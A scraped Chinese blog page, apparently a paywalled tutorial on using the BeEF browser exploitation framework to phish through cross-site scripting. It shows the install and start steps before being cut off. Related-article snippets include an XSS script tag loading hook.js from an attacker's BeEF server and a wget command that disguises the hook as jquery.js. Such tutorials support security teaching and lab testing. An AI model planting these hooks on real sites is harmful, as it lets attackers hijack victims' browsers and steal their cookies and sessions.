BeEf:利用跨站脚本漏洞进行钓鱼

最新推荐文章于 2024-07-15 02:33:42 发布
最新推荐文章于 2024-07-15 02:33:42 发布
阅读量2.4k 收藏 17
点赞数 2
分类专栏: BeEf beef-xss 钓鱼
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42773814/article/details/112851002
版权
BeEf 简介BeEf 是目前最为流行的 Web 框架攻击平台,专注于利用浏览器漏洞,它的全称是 The Browser Exploitation Framework 。BeEf 提供一个 Web 界面来进行操作,只要访问了嵌入 hook.js 的页面,抑或执行了 hook.js 文件的浏览器,就会不断地以 GET 的方式将其自身的相关信息传到 BeEf 的服务端。最新的kali系统已经不会默认安装 BeEf ,需要我们自行安装。apt install beef-xss安装完成后,直接
摘要由CSDN通过智能技术生成

BeEf 简介

BeEf 是目前最为流行的 Web 框架攻击平台,专注于利用浏览器漏洞,它的全称是 The Browser Exploitation Framework 。

BeEf 提供一个 Web 界面来进行操作,只要访问了嵌入 hook.js 的页面,抑或执行了 hook.js 文件的浏览器,就会不断地以 GET 的方式将其自身的相关信息传到 BeEf 的服务端。

复现

最新的kali系统已经不会默认安装 BeEf ,需要我们自行安装。

apt install beef-xss

安装完成后,直接执行 “beef-xss” 命令即可,首次启动需要设置密码再行登录。

之后便会弹出 BeEf 的登录页面

输入用户名口令即可登录

启动 apache2 服务,这样受害者就可以访问钓鱼页面

service apache2 start

接下来我

最低0.47元/天 解锁文章
qq_42773814
关注
  • 2
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
网安工具系列:kali之beef的基础使用
weixin_54626591的博客
04-07 905
kali之beef的基础使用
跨站脚本攻击——使用XSS钓鱼
lay_loge的博客
05-22 1276
一、题目 This lesson is an example of how a website might support a phishing attack Below is an example of a standard search feature. Using XSS and HTML insertion, your goal is to: Insert html to that req...
XSS漏洞及其工具Beef使用
ytdd66的博客
03-22 1328
XSS(Cross Site Scripting,跨站脚本漏洞)漏洞,又叫 CSS 漏洞,是最常见的 Web 应用程序漏洞。其主要原理是当动态页面中插入的内容含有特殊字符(如
BeEF利用XSS漏洞
洞若观火
10-06 2509
XSS跨站脚本攻击,检测与利用方法 poe:<script>alert('XSS')</script> exp:<script src="http://<beef服务端ip>:3000/hook.js"></script>//攻击者ip kali下: find / -name beef-xss                   ...
beef-xss钓鱼
Williamanddog的博客
01-27 623
BeEF(Browser Exploitation Framework)是一款非常强大的Web框架攻击平台,集成了许多 payload,可以通过XSS漏洞配合JavaScript脚本和Metasploit进行渗透。如果你的kali中没有beef的话,执行sudo apt install beef-xss进行安装。_ip:3000/clone_pikachu ,可以看到beef中有机器上线,在页面中进行登录。找到配置文件/usr/share/beef-xss/config.yaml。回到前台查看是否一致。
beef结合msf钓鱼
weixin_34174132的博客
03-17 656
Kali linux 系统默认未安装beef,需要自行安装12apt-getupdateapt-getinstallbeef-xss启动/usr/share/beef-xss12cd/usr/share/beef-xss./beef账号密码127.0.0.1:3000/ui/pannel beef/beef 嵌入代码<script src="Ip:3000/h...
【XSS漏洞07】基于神器beEF的XSS漏洞利用实验(浏览器劫持、会话劫持、GetShell)
Fighting_hawk的博客
02-26 4732
1. 加深理解XSS漏洞利用和危害; 2. 了解beEF工具的使用; 3. 掌握浏览器劫持的攻击方法; 4. 掌握会话劫持的攻击方法; 5. 掌握通过XSS漏洞GetShell的方法。
raylib-beef:用于Beef编程语言的raylib绑定
05-06
雷利比牛肉raylib-beef是Raylib 3.1 dev的Beef包装器库,这是一个简单易用的库。 结合Beef编程语言的优势,制作游戏...)进行更高的抽象快速入门(使用Beef IDE) 下载raylib-beef并将其复制到以下位置: C:\ Progra
docker-beef:BeEF(浏览器开发框架)构建的 Dockerfile
06-20
码头牛肉BeEF 的 Dockerfile(浏览器开发框架) 拉取存储库docker pull malwarelu/beef 启动 BeEF docker docker run malwarelu/beef 正在运行的容器上的 TCP/3000 上可用的服务
beef:更快,更紧凑的std实现
03-20
use beef :: Cow; let borrowed: Cow < str> = Cow :: borrowed ( "Hello" ); let owned: Cow < str> = Cow :: owned ( String :: from ( "World" )); assert_eq! ( format! ( "{} {}!" , borrowed, owned), ...
spine-beef:将Spine运行时移植到牛肉
02-12
这个标签可能表明Spine-beef项目与生物信息学或数据分析有关,尤其是涉及到利用进化树进行假设检验的情况。这可能意味着开发者将Spine.js的交互性和数据管理能力应用于处理HyPhy生成的复杂生物数据,创建了用户友好...
kali漏洞利用BeeF
The__Apollo的博客
04-22 5811
对XSS漏洞往往需要一个强大的框架支持,如网络上的XSS平台,在KALI下,Beef是一款丝毫不逊于XSS平台的工具。Beef是浏览器攻击框架的简称,是一款专注于浏览器的渗透测试工具。打开beefbeef-xss 默认用户名和密码分别为beef/beef 假设被测试主机由于XSS漏洞请求到下面这个页面 这时候可以看到,online browsers就多了一项127.0.0.1
初探BeEF
weixin_30258901的博客
01-23 292
1.什么是BeEF? 就是The Browser Exploitation Framework 的缩写,意在通过一些手段,控制对方的浏览器。 里面集成了很多模块,能够获取很多东西,有cookie,浏览器名字,版本,插件,是否支持java,vb,flash等,所以说XSS神器嘛。。 大概长这个样子(默认用户名密码是beefbeef): 2.安装beef和使用beef BT5...
xss--钓鱼beef
qq_51802152的博客
10-26 144
kali---beef 牛肉的使用
kali linux小白学习(beef网络钓鱼攻击)
Build20的博客
06-01 287
之后,执行wget http://<your kali IP>:3000/hook.js -O /var/www/html/jquery.js命令,执行ls命令可看出生成了一个攻击文件jquery.js,该文件包含xss攻击代码<script src=打开var/www/html文件并查看里面的文件(linux目录下有个目录:/回到kali机,可以看到上钩了,我可以查看他的cookie了。之后进入靶机,把kali机的ip地址输入,可以看到上钩了。1.解析网页语言,如html,php,jsp等。
Kali之Beef利用Xss进行钓鱼
My灬Futrue的博客
07-07 1755
1、操作准备 攻击机:Kali(ip地址:192.168.1.107) 受害者:Windows7 x64(ip地址:192.168.1.163) 2、配置Beef 进入beef的配置文件里 root@kali:~# vim /etc/beef-xss/config.yaml 在这里可以看到beef的默认用户名和密码,也可以进行修改,我这里对默认的密码进行了修改 注:(默认beef用户名和密码位User:beef,Password:beef) 3、启动Beef root@kali:~# beef-xss
BeEF-XSS在本机制作简易钓鱼网站
dasdasdasvsdV的博客
07-15 355
BeEF(Browser Exploitation Framework)是一款非常强大的Web框架攻击平台,集成了许多payload,可以通过XSS漏洞配合JavaScript脚本和Metasploit(MSF)进行渗透。基于Ruby语言编写,并且支持图形化界面,操作简单。
2024浙江省行政区划矢量图层-省市县乡镇四级行政区划数据下载-带python代码
最新发布
08-02
2024最新浙江省行政区划矢量图层数据,包含省、市、县、乡镇四级行政区划数据下载,附带shp转geojson的python代码
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值